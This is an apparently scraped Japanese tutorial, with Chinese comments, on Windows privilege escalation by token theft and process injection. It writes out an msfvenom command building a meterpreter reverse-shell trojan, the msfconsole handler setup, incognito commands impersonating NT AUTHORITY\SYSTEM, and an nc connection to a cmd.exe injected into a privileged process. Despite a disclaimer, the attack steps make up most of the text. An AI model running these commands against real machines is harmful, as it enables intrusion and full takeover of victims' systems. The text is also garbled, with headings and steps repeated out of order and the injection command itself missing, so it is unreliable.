権限昇格: トークン盗用 || プロセスインジェクション。

免責事項:

権力の昇格は次のように考えました。

権限昇格: トークンの盗用。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 
lport=4444 -f exe > bgxg.exe
 
// lhost=kali的IP地址 
// lport=端口号（比如4444） 
// -f exe > 文件名.exe

msfconsole            //打开 msf 命令

use exploit/multi/handler        //加载模块

set payload windows/meterpreter/reverse_tcp  
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)   

set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)

set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)

run                //执行命令

getuid        //查看权限

use incognito        //窃取令牌模块

list_tokens -u       //查看可以窃取权限

impersonate_token "NT AUTHORITY\SYSTEM"    //窃取权限

権限昇格: プロセスインジェクション。

-p           //是指注入进程
604          //是IPD的编号
cmd.exe      //cmd窗口
6666         //是端口

整条命令的意思就是：
把 cmd 窗口注入把这个进程中，然后在本地开启这个端口.
谁连接的这个端口就能进入到 cmd 窗口中.

nc 目标IP地址 端口

nc 192.168.0.106 6666

権限昇格: トークン盗用 || プロセスインジェクション。

権限昇格: トークン盗用 || プロセスインジェクション。

目次：

免責事項:

権力の昇格は次のように考えました。

権限昇格: トークンの盗用。

権限昇格: プロセスインジェクション。

権限昇格: トークン盗用 || プロセス インジェクション。

権限昇格: トークン盗用 || プロセス インジェクション。

目次：

免責事項:

この記事に記載されている技術を使用して違法な攻撃を行うことは固く禁じられています。使用しない場合の結果は自己責任であり、アップロード者は一切の責任を負いません。

権力の昇格は次のように考えました。

ローカル権限昇格の実験: セッションを取得 - モジュールを使用 - トークンを盗む - 権限昇格

権限昇格: トークンの盗用。

最初のステップ: バックグラウンド プログラムの生成 (トロイの木馬)

ステップ 2: 新しく生成されたプログラムを昇格するサーバーにアップロードします。

ステップ 3: msf をサーバーに直接インストールします (ここでテストするために、msf を kali に直接インストールします) (2 つのサーバーが通信できる必要があります)。

ステップ 4: Windows オペレーティング システムでプログラムを実行し、サーバー ( kali ) に戻ります。

ステップ 5: アクセス許可を増やす (トークンの盗用)

権限昇格: プロセス インジェクション。

手順 1: コマンド ラインを開き、プログラムをコマンド ラインにドラッグして、-l を追加します(現在のコンピューター プロセス リストを取得します)。

ステップ 2: 高い権限を持つプロセスを見つけて、cmd を挿入します。

ステップ 3: nc を使用してこのポートに接続し、cmd ウィンドウに入ります。

おすすめ

権限昇格: トークン盗用 || プロセスインジェクション。

権限昇格: トークン盗用 || プロセスインジェクション。

最初のステップ: バックグラウンドプログラムの生成 (トロイの木馬)

ステップ 4: Windows オペレーティングシステムでプログラムを実行し、サーバー ( kali ) に戻ります。

権限昇格: プロセスインジェクション。

手順 1: コマンドラインを開き、プログラムをコマンドラインにドラッグして、-l を追加します(現在のコンピュータープロセスリストを取得します)。